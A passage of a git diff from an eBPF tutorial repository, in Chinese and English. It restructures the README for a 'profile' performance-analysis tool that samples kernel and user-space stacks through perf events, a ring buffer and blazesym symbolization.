`event->comm`. - 使用 `bpf_get_current_comm()` 函数获取当前进程名并将其存储到 `event->comm`。 +6. Get kernel stack information: -6. 获取内核栈信息: +```c - ```c +event->kstack_sz = bpf_get_stack(ctx, event->kstack, sizeof(event->kstack), 0); +``` - event->kstack_sz = bpf_get_stack(ctx, event->kstack, sizeof(event->kstack), 0); - ``` +Use the `bpf_get_stack()` function to get kernel stack information. Store the result in `event->kstack` and the size in `event->kstack_sz`. - 使用 `bpf_get_stack()` 函数获取内核栈信息。将结果存储在 `event->kstack`,并将其大小存储在 `event->kstack_sz`。 +7. Get user space stack information: -7. 获取用户空间栈信息: +```c +event->ustack_sz = bpf_get_stack(ctx, event->ustack, sizeof(event->ustack), BPF_F_USER_STACK); +``` - ```c - event->ustack_sz = bpf_get_stack(ctx, event->ustack, sizeof(event->ustack), BPF_F_USER_STACK); - ``` +Using the `bpf_get_stack()` function with the `BPF_F_USER_STACK` flag retrieves information about the user space stack. Store the result in `event->ustack` and its size in `event->ustack_sz`. - 同样使用 `bpf_get_stack()` 函数,但传递 `BPF_F_USER_STACK` 标志以获取用户空间栈信息。将结果存储在 `event->ustack`,并将其大小存储在 `event->ustack_sz`。 +8. Submit the event to the Ring Buffer: -8. 将事件提交到 Ring Buffer: - - ```c +```c bpf_ringbuf_submit(event, 0); - ``` +``` - 最后,使用 `bpf_ringbuf_submit()` 函数将事件提交到 Ring Buffer,以便用户空间程序可以读取和处理。 +Finally, use the `bpf_ringbuf_submit()` function to submit the event to the Ring Buffer for the user space program to read and process. - 这个内核态 eBPF 程序通过定期采样程序的内核栈和用户空间栈来捕获程序的执行流程。这些数据将存储在 Ring Buffer 中,以便用户态的 `profile` 程序能读取。 +This kernel mode eBPF program captures the program's execution flow by sampling the kernel stack and user space stack of the program periodically. These data are stored in the Ring Buffer for the user mode `profile` program to read. -### 用户态部分 +### User Mode Section -这段代码主要负责为每个在线 CPU 设置 perf event 并附加 eBPF 程序: +This code is mainly responsible for setting up perf events for each online CPU and attaching eBPF programs: ```c static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid, @@ -218,9 +217,9 @@ int main(){ } ``` -`perf_event_open` 这个函数是一个对 perf_event_open 系统调用的封装。它接收一个 perf_event_attr 结构体指针,用于指定 perf event 的类型和属性。pid 参数用于指定要监控的进程 ID(-1 表示监控所有进程),cpu 参数用于指定要监控的 CPU。group_fd 参数用于将 perf event 分组,这里我们使用 -1,表示不需要分组。flags 参数用于设置一些标志,这里我们使用 PERF_FLAG_FD_CLOEXEC 以确保在执行 exec 系列系统调用时关闭文件描述符。 +The `perf_event_open` function is a wrapper for the perf_event_open system call. It takes a pointer to a perf_event_attr structure to specify the type and attributes of the perf event. The pid parameter is used to specify the process ID to monitor (-1 for monitoring all processes), and the cpu parameter is used to specify the CPU to monitor. The group_fd parameter is used to group perf events, and we use -1 here to indicate no grouping is needed. The flags parameter is used to set some flags, and we use PERF_FLAG_FD_CLOEXEC to ensure file descriptors are closed when executing exec series system calls. -在 main 函数中: +In the main function: ```c for (cpu = 0; cpu < num_cpus; cpu++) { @@ -228,11 +227,9 @@ for (cpu = 0; cpu < num_cpus; cpu++) { } ``` -这个循环针对每个在线 CPU 设置 perf event 并附加 eBPF 程序。首先,它会检查当前 CPU 是否在线,如果不在线则跳过。然后,使用 perf_event_open() 函数为当前 CPU 设置 perf event,并将返回的文件描述符存储在 pefds 数组中。最后,使用 bpf_program__attach_perf_event() 函数将 eBPF 程序附加到 perf event。links 数组用于存储每个 CPU 上的 BPF 链接,以便在程序结束时销毁它们。 +This loop sets up perf events and attaches eBPF programs for each online CPU. Firstly, it checks if the current CPU is online and skips if it's not. Then, it uses the perf_event_open() function to set up perf events for the current CPU and stores the returned file descriptor in the pefds array. Finally, it attaches the eBPF program to the perf event using the bpf_program__attach_perf_event() function. The links array is used to store the BPF links for each CPU so that they can be destroyed when the program ends.By doing so, user-mode programs set perf events for each online CPU and attach eBPF programs to these perf events to monitor all online CPUs in the system. -通过这种方式,用户态程序为每个在线 CPU 设置 perf event,并将 eBPF 程序附加到这些 perf event 上,从而实现对系统中所有在线 CPU 的监控。 - -以下这两个函数分别用于显示栈回溯和处理从 ring buffer 接收到的事件: +The following two functions are used to display stack traces and handle events received from the ring buffer: ```c static void show_stack_trace(__u64 *stack, int stack_sz, pid_t pid) @@ -320,16 +317,18 @@ static int event_handler(void *_ctx, void *data, size_t size) } ``` -`show_stack_trace()` 函数用于显示内核或用户空间的栈回溯。它接收一个 stack 参数,是一个指向内核或用户空间栈的指针,stack_sz 参数表示栈的大小,pid 参数表示要显示的进程的 ID(当显示内核栈时,设置为 0)。函数中首先根据 pid 参数确定栈的来源(内核或用户空间),然后调用 blazesym_symbolize() 函数将栈中的地址解析为符号名和源代码位置。最后,遍历解析结果,输出符号名和源代码位置信息。 +The `show_stack_trace()` function is used to display the stack trace of the kernel or userspace. It takes a `stack` parameter, which is a pointer to the kernel or userspace stack, and a `stack_sz` parameter, which represents the size of the stack. The `pid` parameter represents the ID of the process to be displayed (set to 0 when displaying the kernel stack). In the function, the source of the stack (kernel or userspace) is determined based on the `pid` parameter, and then the `blazesym_symbolize()` function is called to resolve the addresses in the stack to symbol names and source code locations. Finally, the resolved results are traversed and the symbol names and source code location information are outputted. -`event_handler()` 函数用于处理从 ring buffer 接收到的事件。它接收一个 data 参数,指向 ring buffer 中的数据,size 参数表示数据的大小。函数首先将 data 指针转换为 stacktrace_event 结构体指针,然后检查内核和用户空间栈的大小。如果栈为空,则直接返回。接下来,函数输出进程名称、进程 ID 和 CPU ID 信息。然后分别显示内核栈和用户空间栈的回溯。调用 show_stack_trace() 函数时,分别传入内核栈和用户空间栈的地址、大小和进程 ID。 +The `event_handler()` function is used to handle events received from the ring buffer. It takes a `data` parameter, which points to the data in the ring buffer, and a `size` parameter, which represents the size of the data. The function first converts the `data` pointer to a pointer of type `stacktrace_event`, and then checks the sizes of the kernel and userspace stacks. If the stacks are empty, it returns directly. Next, the function outputs the process name, process ID, and CPU ID information. Then it displays the stack traces of the kernel and userspace respectively. When calling the `show_stack_trace()` function, the addresses, sizes, and process ID of the kernel and userspace stacks are passed in separately. -这两个函数作为 eBPF profile 工具的一部分,用于显示和处理 eBPF 程序收集到的栈回溯信息,帮助用户了解程序的运行情况和性能瓶颈。 +These two functions are part of the eBPF profiling tool, used to display and process stack trace information collected by eBPF programs, helping users understand program performance and bottlenecks. -### 总结 +### Summary -通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 程序进行性能分析。在这个过程中,我们详细讲解了如何创建 eBPF 程序,监控进程的性能,并从 ring buffer 中获取数据以分析栈回溯。我们还学习了如何使用 perf_event_open() 函数设置性能监控,并将 BPF 程序附加到性能事件上。在本教程中,我们还展示了如何编写 eBPF 程序来捕获进程的内核和用户空间栈信息,进而分析程序性能瓶颈。通过这个例子,您可以了解到 eBPF 在性能分析方面的强大功能。 +Through this introductory tutorial on eBPF, we have learned how to use eBPF programs for performance analysis. In this process, we explained in detail how to create eBPF programs, monitor process performance, and retrieve data from the ring buffer for analyzing stack traces. We also learned how to use the `perf_event_open()` function to set up performance monitoring and attach BPF programs to performance events. In this tutorial, we also demonstrated how to write eBPF programs to capture the kernel and userspace stack information of processes in order to analyze program performance bottlenecks. With this example, you can understand the powerful features of eBPF in performance analysis. -如果您希望学习更多关于 eBPF 的知识和实践,请查阅 eunomia-bpf 的官方文档: 。您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you want to learn more about eBPF knowledge and practices, please refer to the official documentation of eunomia-bpf: . You can also visit our tutorial code repository or website for more examples and complete tutorials. -接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术,希望这些内容对您在 eBPF 开发道路上的学习和实践有所帮助。 +The next tutorial will further explore advanced features of eBPF. We will continue to share more content about eBPF development practices to help you better understand and master eBPF technology. We hope these contents will be helpful for your learning and practice on the eBPF development journey. + +> The original link of this article: diff --git a/src/12-profile/README.zh.md b/src/12-profile/README.zh.md new file mode 100644 index 0000000..d1f73f5 --- /dev/null +++ b/src/12-profile/README.zh.md @@ -0,0 +1,335 @@ +# eBPF 入门实践教程十二:使用 eBPF 程序 profile 进行性能分析 + +本教程将指导您使用 libbpf 和 eBPF 程序进行性能分析。我们将利用内核中的 perf 机制,学习如何捕获函数的执行时间以及如何查看性能数据。 + +libbpf 是一个用于与 eBPF 交互的 C 库。它提供了创建、加载和使用 eBPF 程序所需的基本功能。本教程中,我们将主要使用 libbpf 完成开发工作。perf 是 Linux 内核中的性能分析工具,允许用户测量和分析内核及用户空间程序的性能,以及获取对应的调用堆栈。它利用内核中的硬件计数器和软件事件来收集性能数据。 + +## eBPF 工具:profile 性能分析示例 + +`profile` 工具基于 eBPF 实现,利用 Linux 内核中的 perf 事件进行性能分析。`profile` 工具会定期对每个处理器进行采样,以便捕获内核函数和用户空间函数的执行。它可以显示栈回溯的以下信息: + +- 地址:函数调用的内存地址 +- 符号:函数名称 +- 文件名:源代码文件名称 +- 行号:源代码中的行号 + +这些信息有助于开发人员定位性能瓶颈和优化代码。更进一步,可以通过这些对应的信息生成火焰图,以便更直观的查看性能数据。 + +在本示例中,可以通过 libbpf 库编译运行它(以 Ubuntu/Debian 为例): + +**NOTE:** 首先需要安装 `cargo` 才能编译得到 `profile`, 安装方法可以参考[Cargo 手册](https://rustwiki.org/en/cargo/getting-started/installation.html) + +```console +$ git submodule update --init --recursive +$ sudo apt install clang libelf1 libelf-dev zlib1g-dev +$ make +$ sudo ./profile +COMM: chronyd (pid=156) @ CPU 1 +Kernel: + 0 [] _raw_spin_lock_irqsave+0x16 + 1 [] remove_wait_queue+0x14 + 2 [] poll_freewait+0x3d + 3 [] do_select+0x7bf + 4 [] core_sys_select+0x182 + 5 [] __x64_sys_pselect6+0xea + 6 [] do_syscall_64+0x38 + 7 [] entry_SYSCALL_64_after_hwframe+0x61 +Userspace: + 0 [<00007fab187bfe09>] + 1 [<000000000ee6ae98>] + +COMM: profile (pid=9843) @ CPU 6 +No Kernel Stack +Userspace: + 0 [<0000556deb068ac8>] + 1 [<0000556dec34cad0>] +``` + +## 实现原理 + +profile 工具由两个部分组成,内核态中的 eBPF 程序和用户态中的 `profile` 符号处理程序。`profile` 符号处理程序负责加载 eBPF 程序,以及处理 eBPF 程序输出的数据。 + +### 内核态部分 + +内核态 eBPF 程序的实现逻辑主要是借助 perf event,对程序的堆栈进行定时采样,从而捕获程序的执行流程。 + +```c +// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause +/* Copyright (c) 2022 Meta Platforms, Inc. */ +#include "vmlinux.h" +#include +#include +#include + +#include "profile.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} events SEC(".maps"); + +SEC("perf_event") +int profile(void *ctx) +{ + int pid = bpf_get_current_pid_tgid() >> 32; + int cpu_id = bpf_get_smp_processor_id(); + struct stacktrace_event *event; + int cp; + + event = bpf_ringbuf_reserve(&events, sizeof(*event), 0); + if (!event) + return 1; + + event->pid = pid; + event->cpu_id = cpu_id; + + if (bpf_get_current_comm(event->comm, sizeof(event->comm))) + event->comm[0] = 0; + + event->kstack_sz = bpf_get_stack(ctx, event->kstack, sizeof(event->kstack), 0); + + event->ustack_sz = bpf_get_stack(ctx, event->ustack, sizeof(event->ustack), BPF_F_USER_STACK); + + bpf_ringbuf_submit(event, 0); + + return 0; +} +``` + +接下来,我们将重点讲解内核态代码的关键部分。 + +1. 定义 eBPF maps `events`: + + ```c + + struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); + } events SEC(".maps"); + ``` + + 这里定义了一个类型为 `BPF_MAP_TYPE_RINGBUF` 的 eBPF maps 。Ring Buffer 是一种高性能的循环缓冲区,用于在内核和用户空间之间传输数据。`max_entries` 设置了 Ring Buffer 的最大大小。 + +2. 定义 `perf_event` eBPF 程序: + + ```c + SEC("perf_event") + int profile(void *ctx) + ``` + + 这里定义了一个名为 `profile` 的 eBPF 程序,它将在 perf 事件触发时执行。 + +3. 获取进程 ID 和 CPU ID: + + ```c + int pid = bpf_get_current_pid_tgid() >> 32; + int cpu_id = bpf_get_smp_processor_id(); + ``` + + `bpf_get_current_pid_tgid()` 函数返回当前进程的 PID 和 TID,通过右移 32 位,我们得到 PID。`bpf_get_smp_processor_id()` 函数返回当前 CPU 的 ID。 + +4. 预留 Ring Buffer 空间: + + ```c + event = bpf_ringbuf_reserve(&events, sizeof(*event), 0); + if (!event) + return 1; + ``` + + 通过 `bpf_ringbuf_reserve()` 函数预留 Ring Buffer 空间,用于存储采集的栈信息。若预留失败,返回错误. + +5. 获取当前进程名: + + ```c + + if (bpf_get_current_comm(event->comm, sizeof(event->comm))) + event->comm[0] = 0; + ``` + + 使用 `bpf_get_current_comm()` 函数获取当前进程名并将其存储到 `event->comm`。 + +6. 获取内核栈信息: + + ```c + + event->kstack_sz = bpf_get_stack(ctx, event->kstack, sizeof(event->kstack), 0); + ``` + + 使用 `bpf_get_stack()` 函数获取内核栈信息。将结果存储在 `event->kstack`,并将其大小存储在 `event->kstack_sz`。 + +7. 获取用户空间栈信息: + + ```c + event->ustack_sz = bpf_get_stack(ctx, event->ustack, sizeof(event->ustack), BPF_F_USER_STACK); + ``` + + 同样使用 `bpf_get_stack()` 函数,但传递 `BPF_F_USER_STACK` 标志以获取用户空间栈信息。将结果存储在 `event->ustack`,并将其大小存储在 `event->ustack_sz`。 + +8. 将事件提交到 Ring Buffer: + + ```c + bpf_ringbuf_submit(event, 0); + ``` + + 最后,使用 `bpf_ringbuf_submit()` 函数将事件提交到 Ring Buffer,以便用户空间程序可以读取和处理。 + + 这个内核态 eBPF 程序通过定期采样程序的内核栈和用户空间栈来捕获程序的执行流程。这些数据将存储在 Ring Buffer 中,以便用户态的 `profile` 程序能读取。 + +### 用户态部分 + +这段代码主要负责为每个在线 CPU 设置 perf event 并附加 eBPF 程序: + +```c +static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid, + int cpu, int group_fd, unsigned long flags) +{ + int ret; + + ret = syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags); + return ret; +} + +int main(){ + ... + for (cpu = 0; cpu < num_cpus; cpu++) { + /* skip offline/not present CPUs */ + if (cpu >= num_online_cpus || !online_mask[cpu]) + continue; + + /* Set up performance monitoring on a CPU/Core */ + pefd = perf_event_open(&attr, pid, cpu, -1, PERF_FLAG_FD_CLOEXEC); + if (pefd < 0) { + fprintf(stderr, "Fail to set up performance monitor on a CPU/Core\n"); + err = -1; + goto cleanup; + } + pefds[cpu] = pefd; + + /* Attach a BPF program on a CPU */ + links[cpu] = bpf_program__attach_perf_event(skel->progs.profile, pefd); + if (!links[cpu]) { + err = -1; + goto cleanup; + } + } + ... +} +``` + +`perf_event_open` 这个函数是一个对 perf_event_open 系统调用的封装。它接收一个 perf_event_attr 结构体指针,用于指定 perf event 的类型和属性。pid 参数用于指定要监控的进程 ID(-1 表示监控所有进程),cpu 参数用于指定要监控的 CPU。group_fd 参数用于将 perf event 分组,这里我们使用 -1,表示不需要分组。flags 参数用于设置一些标志,这里我们使用 PERF_FLAG_FD_CLOEXEC 以确保在执行 exec 系列系统调用时关闭文件描述符。 + +在 main 函数中: + +```c +for (cpu = 0; cpu < num_cpus; cpu++) { + // ... +} +``` + +这个循环针对每个在线 CPU 设置 perf event 并附加 eBPF 程序。首先,它会检查当前 CPU 是否在线,如果不在线则跳过。然后,使用 perf_event_open() 函数为当前 CPU 设置 perf event,并将返回的文件描述符存储在 pefds 数组中。最后,使用 bpf_program__attach_perf_event() 函数将 eBPF 程序附加到 perf event。links 数组用于存储每个 CPU 上的 BPF 链接,以便在程序结束时销毁它们。 + +通过这种方式,用户态程序为每个在线 CPU 设置 perf event,并将 eBPF 程序附加到这些 perf event 上,从而实现对系统中所有在线 CPU 的监控。 + +以下这两个函数分别用于显示栈回溯和处理从 ring buffer 接收到的事件: + +```c +static void show_stack_trace(__u64 *stack, int stack_sz, pid_t pid) +{ + const struct blazesym_result *result; + const struct blazesym_csym *sym; + sym_src_cfg src; + int i, j; + + if (pid) { + src.src_type = SRC_T_PROCESS; + src.params.process.pid = pid; + } else { + src.src_type = SRC_T_KERNEL; + src.params.kernel.kallsyms = NULL; + src.params.kernel.kernel_image = NULL; + } + + result = blazesym_symbolize(symbolizer, &src, 1, (const uint64_t *)stack, stack_sz); + + for (i = 0; i < stack_sz; i++) { + if (!result || result->size <= i || !result->entries[i].size) { + printf(" %d [<%016llx>]\n", i, stack[i]); + continue; + } + + if (result->entries[i].size == 1) { + sym = &result->entries[i].syms[0]; + if (sym->path && sym->path[0]) { + printf(" %d [<%016llx>] %s+0x%llx %s:%ld\n", + i, stack[i], sym->symbol, + stack[i] - sym->start_address, + sym->path, sym->line_no); + } else { + printf(" %d [<%016llx>] %s+0x%llx\n", + i, stack[i], sym->symbol, + stack[i] - sym->start_address); + } + continue; + } + + printf(" %d [<%016llx>]\n", i, stack[i]); + for (j = 0; j < result->entries[i].size; j++) { + sym = &result->entries[i].syms[j]; + if (sym->path && sym->path[0]) { + printf(" %s+0x%llx %s:%ld\n", + sym->symbol, stack[i] - sym->start_address, + sym->path, sym->line_no); + } else { + printf(" %s+0x%llx\n", sym->symbol, + stack[i] - sym->start_address); + } + } + } + + blazesym_result_free(result); +} + +/* Receive events from the ring buffer. */ +static int event_handler(void *_ctx, void *data, size_t size) +{ + struct stacktrace_event *event = data; + + if (event->kstack_sz <= 0 && event->ustack_sz <= 0) + return 1; + + printf("COMM: %s (pid=%d) @ CPU %d\n", event->comm, event->pid, event->cpu_id); + + if (event->kstack_sz > 0) { + printf("Kernel:\n"); + show_stack_trace(event->kstack, event->kstack_sz / sizeof(__u64), 0); + } else { + printf("No Kernel Stack\n"); + } + + if (event->ustack_sz > 0) { + printf("Userspace:\n"); + show_stack_trace(event->ustack, event->ustack_sz / sizeof(__u64), event->pid); + } else { + printf("No Userspace Stack\n"); + } + + printf("\n"); + return 0; +} +``` + +`show_stack_trace()` 函数用于显示内核或用户空间的栈回溯。它接收一个 stack 参数,是一个指向内核或用户空间栈的指针,stack_sz 参数表示栈的大小,pid 参数表示要显示的进程的 ID(当显示内核栈时,设置为 0)。函数中首先根据 pid 参数确定栈的来源(内核或用户空间),然后调用 blazesym_symbolize() 函数将栈中的地址解析为符号名和源代码位置。最后,遍历解析结果,输出符号名和源代码位置信息。 + +`event_handler()` 函数用于处理从 ring buffer 接收到的事件。它接收一个 data 参数,指向 ring buffer 中的数据,size 参数表示数据的大小。函数首先将 data 指针转换为 stacktrace_event 结构体指针,然后检查内核和用户空间栈的大小。如果栈为空,则直接返回。接下来,函数输出进程名称、进程 ID 和 CPU ID 信息。然后分别显示内核栈和用户空间栈的回溯。调用 show_stack_trace() 函数时,分别传入内核栈和用户空间栈的地址、大小和进程 ID。 + +这两个函数作为 eBPF profile 工具的一部分,用于显示和处理 eBPF 程序收集到的栈回溯信息,帮助用户了解程序的运行情况和性能瓶颈。 + +### 总结 + +通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 程序进行性能分析。在这个过程中,我们详细讲解了如何创建 eBPF 程序,监控进程的性能,并从 ring buffer 中获取数据以分析栈回溯。我们还学习了如何使用 perf_event_open() 函数设置性能监控,并将 BPF 程序附加到性能事件上。在本教程中,我们还展示了如何编写 eBPF 程序来捕获进程的内核和用户空间栈信息,进而分析程序性能瓶颈。通过这个例子,您可以了解到 eBPF 在性能分析方面的强大功能。 + +如果您希望学习更多关于 eBPF 的知识和实践,请查阅 eunomia-bpf 的官方文档: 。您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术,希望这些内容对您在 eBPF 开发道路上的学习和实践有所帮助。 diff --git a/src/12-profile/README_en.md b/src/12-profile/README_en.md deleted file mode 100644 index c6a825f..0000000 --- a/src/12-profile/README_en.md +++ /dev/null @@ -1,334 +0,0 @@ -# eBPF Tutorial by Example 12: Using eBPF Program Profile for Performance Analysis - -This tutorial will guide you on using libbpf and eBPF programs for performance analysis. We will leverage the perf mechanism in the kernel to learn how to capture the execution time of functions and view performance data. - -libbpf is a C library for interacting with eBPF. It provides the basic functionality for creating, loading, and using eBPF programs. In this tutorial, we will mainly use libbpf for development. Perf is a performance analysis tool in the Linux kernel that allows users to measure and analyze the performance of kernel and user space programs, as well as obtain corresponding call stacks. It collects performance data using hardware counters and software events in the kernel. - -## eBPF Tool: profile Performance Analysis Example - -The `profile` tool is implemented based on eBPF and utilizes the perf events in the Linux kernel for performance analysis. The `profile` tool periodically samples each processor to capture the execution of kernel and user space functions. It provides the following information for stack traces: - -- Address: memory address of the function call -- Symbol: function name -- File Name: name of the source code file -- Line Number: line number in the source code - -This information helps developers locate performance bottlenecks and optimize code. Furthermore, flame graphs can be generated based on this information for a more intuitive view of performance data. - -In this example, you can compile and run it with the libbpf library (using Ubuntu/Debian as an example): - -**NOTE:** To compile the `profile`, you first need to install `Cargo`, as shown in ["The Cargo Book"](https://rustwiki.org/en/cargo/getting-started/installation.html) - -```console -$ git submodule update --init --recursive -$ sudo apt install clang libelf1 libelf-dev zlib1g-dev -$ make -$ sudo ./profile -COMM: chronyd (pid=156) @ CPU 1 -Kernel: - 0 [] _raw_spin_lock_irqsave+0x16 - 1 [] remove_wait_queue+0x14 - 2 [] poll_freewait+0x3d - 3 [] do_select+0x7bf - 4 [] core_sys_select+0x182 - 5 [] __x64_sys_pselect6+0xea - 6 [] do_syscall_64+0x38 - 7 [] entry_SYSCALL_64_after_hwframe+0x61 -Userspace: - 0 [<00007fab187bfe09>] - 1 [<000000000ee6ae98>] - -COMM: profile (pid=9843) @ CPU 6 -No Kernel Stack -Userspace: - 0 [<0000556deb068ac8>] - 1 [<0000556dec34cad0>] -``` - -## Implementation Principle - -The `profile` tool consists of two parts: the eBPF program in kernel space and the `profile` symbol handling program in user space. The `profile` symbol handling program is responsible for loading the eBPF program and processing the data outputted by the eBPF program. - -### Kernel Space Part - -The implementation logic of the eBPF program in kernel space mainly relies on perf events to periodically sample the stack of the program, thereby capturing its execution flow. - -```c -// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause -/* Copyright (c) 2022 Meta Platforms, Inc. */ -#include "vmlinux.h" -#include -#include -#include - -#include "profile.h" - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -struct { - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 256 * 1024); -} events SEC(".maps"); - -SEC("perf_event") -int profile(void *ctx) -{ - int pid = bpf_get_current_pid_tgid() >> 32; - int cpu_id = bpf_get_smp_processor_id(); - struct stacktrace_event *event; - int cp; - - event = bpf_ringbuf_reserve(&events, sizeof(*event), 0); - if (!event) - return 1; - - event->pid = pid; - event->cpu_id = cpu_id; - - if (bpf_get_current_comm(event->comm, sizeof(event->comm))) - event->comm[0] = 0; - - event->kstack_sz = bpf_get_stack(ctx, event->kstack, sizeof(event->kstack), 0); - - event->ustack_sz = bpf_get_stack(ctx, event->ustack, sizeof(event->ustack), BPF_F_USER_STACK); - - bpf_ringbuf_submit(event, 0); - - return 0; -} -``` - -Next, we will focus on the key part of the kernel code. - -1. Define eBPF maps `events`: - -```c -struct { - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 256 * 1024); -} events SEC(".maps"); -``` - -Here, a eBPF maps of type `BPF_MAP_TYPE_RINGBUF` is defined. The Ring Buffer is a high-performance circular buffer used to transfer data between the kernel and user space. `max_entries` sets the maximum size of the Ring Buffer. - -2. Define `perf_event` eBPF program: - -```c -SEC("perf_event") -int profile(void *ctx) -``` - -Here, a eBPF program named `profile` is defined, which will be executed when a perf event is triggered. - -3. Get process ID and CPU ID: - -```c -int pid = bpf_get_current_pid_tgid() >> 32; -int cpu_id = bpf_get_smp_processor_id(); -``` - -The function `bpf_get_current_pid_tgid()` returns the PID and TID of the current process. By right shifting 32 bits, we get the PID. The function `bpf_get_smp_processor_id()` returns the ID of the current CPU. - -4. Reserve space in the Ring Buffer: - -```c -event = bpf_ringbuf_reserve(&events, sizeof(*event), 0); -if (!event) - return 1; -``` - -Use the `bpf_ringbuf_reserve()` function to reserve space in the Ring Buffer for storing the collected stack information. If the reservation fails, return an error. - -5. Get the current process name: - -```c - -if (bpf_get_current_comm(event->comm, sizeof(event->comm))) - event->comm[0] = 0; -``` - -Use the `bpf_get_current_comm()` function to get the current process name and store it in `event->comm`. - -6. Get kernel stack information: - -```c - -event->kstack_sz = bpf_get_stack(ctx, event->kstack, sizeof(event->kstack), 0); -``` - -Use the `bpf_get_stack()` function to get kernel stack information. Store the result in `event->kstack` and the size in `event->kstack_sz`. - -7. Get user space stack information: - -```c -event->ustack_sz = bpf_get_stack(ctx, event->ustack, sizeof(event->ustack), BPF_F_USER_STACK); -``` - -Using the `bpf_get_stack()` function with the `BPF_F_USER_STACK` flag retrieves information about the user space stack. Store the result in `event->ustack` and its size in `event->ustack_sz`. - -8. Submit the event to the Ring Buffer: - -```c - bpf_ringbuf_submit(event, 0); -``` - -Finally, use the `bpf_ringbuf_submit()` function to submit the event to the Ring Buffer for the user space program to read and process. - -This kernel mode eBPF program captures the program's execution flow by sampling the kernel stack and user space stack of the program periodically. These data are stored in the Ring Buffer for the user mode `profile` program to read. - -### User Mode Section - -This code is mainly responsible for setting up perf events for each online CPU and attaching eBPF programs: - -```c -static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid, - int cpu, int group_fd, unsigned long flags) -{ - int ret; - - ret = syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags); - return ret; -} - -int main(){ - ... - for (cpu = 0; cpu < num_cpus; cpu++) { - /* skip offline/not present CPUs */ - if (cpu >= num_online_cpus || !online_mask[cpu]) - continue; - - /* Set up performance monitoring on a CPU/Core */ - pefd = perf_event_open(&attr, pid, cpu, -1, PERF_FLAG_FD_CLOEXEC); - if (pefd < 0) { - fprintf(stderr, "Fail to set up performance monitor on a CPU/Core\n"); - err = -1; - goto cleanup; - } - pefds[cpu] = pefd; - - /* Attach a BPF program on a CPU */ - links[cpu] = bpf_program__attach_perf_event(skel->progs.profile, pefd); - if (!links[cpu]) { - err = -1; - goto cleanup; - } - } - ... -} -``` - -The `perf_event_open` function is a wrapper for the perf_event_open system call. It takes a pointer to a perf_event_attr structure to specify the type and attributes of the perf event. The pid parameter is used to specify the process ID to monitor (-1 for monitoring all processes), and the cpu parameter is used to specify the CPU to monitor. The group_fd parameter is used to group perf events, and we use -1 here to indicate no grouping is needed. The flags parameter is used to set some flags, and we use PERF_FLAG_FD_CLOEXEC to ensure file descriptors are closed when executing exec series system calls. - -In the main function: - -```c -for (cpu = 0; cpu < num_cpus; cpu++) { - // ... -} -``` - -This loop sets up perf events and attaches eBPF programs for each online CPU. Firstly, it checks if the current CPU is online and skips if it's not. Then, it uses the perf_event_open() function to set up perf events for the current CPU and stores the returned file descriptor in the pefds array. Finally, it attaches the eBPF program to the perf event using the bpf_program__attach_perf_event() function. The links array is used to store the BPF links for each CPU so that they can be destroyed when the program ends.By doing so, user-mode programs set perf events for each online CPU and attach eBPF programs to these perf events to monitor all online CPUs in the system. - -The following two functions are used to display stack traces and handle events received from the ring buffer: - -```c -static void show_stack_trace(__u64 *stack, int stack_sz, pid_t pid) -{ - const struct blazesym_result *result; - const struct blazesym_csym *sym; - sym_src_cfg src; - int i, j; - - if (pid) { - src.src_type = SRC_T_PROCESS; - src.params.process.pid = pid; - } else { - src.src_type = SRC_T_KERNEL; - src.params.kernel.kallsyms = NULL; - src.params.kernel.kernel_image = NULL; - } - - result = blazesym_symbolize(symbolizer, &src, 1, (const uint64_t *)stack, stack_sz); - - for (i = 0; i < stack_sz; i++) { - if (!result || result->size <= i || !result->entries[i].size) { - printf(" %d [<%016llx>]\n", i, stack[i]); - continue; - } - - if (result->entries[i].size == 1) { - sym = &result->entries[i].syms[0]; - if (sym->path && sym->path[0]) { - printf(" %d [<%016llx>] %s+0x%llx %s:%ld\n", - i, stack[i], sym->symbol, - stack[i] - sym->start_address, - sym->path, sym->line_no); - } else { - printf(" %d [<%016llx>] %s+0x%llx\n", - i, stack[i], sym->symbol, - stack[i] - sym->start_address); - } - continue; - } - - printf(" %d [<%016llx>]\n", i, stack[i]); - for (j = 0; j < result->entries[i].size; j++) { - sym = &result->entries[i].syms[j]; - if (sym->path && sym->path[0]) { - printf(" %s+0x%llx %s:%ld\n", - sym->symbol, stack[i] - sym->start_address, - sym->path, sym->line_no); - } else { - printf(" %s+0x%llx\n", sym->symbol, - stack[i] - sym->start_address); - } - } - } - - blazesym_result_free(result); -} - -/* Receive events from the ring buffer. */ -static int event_handler(void *_ctx, void *data, size_t size) -{ - struct stacktrace_event *event = data; - - if (event->kstack_sz <= 0 && event->ustack_sz <= 0) - return 1; - - printf("COMM: %s (pid=%d) @ CPU %d\n", event->comm, event->pid, event->cpu_id); - - if (event->kstack_sz > 0) { - printf("Kernel:\n"); - show_stack_trace(event->kstack, event->kstack_sz / sizeof(__u64), 0); - } else { - printf("No Kernel Stack\n"); - } - - if (event->ustack_sz > 0) { - printf("Userspace:\n"); - show_stack_trace(event->ustack, event->ustack_sz / sizeof(__u64), event->pid); - } else { - printf("No Userspace Stack\n"); - } - - printf("\n"); - return 0; -} -``` - -The `show_stack_trace()` function is used to display the stack trace of the kernel or userspace. It takes a `stack` parameter, which is a pointer to the kernel or userspace stack, and a `stack_sz` parameter, which represents the size of the stack. The `pid` 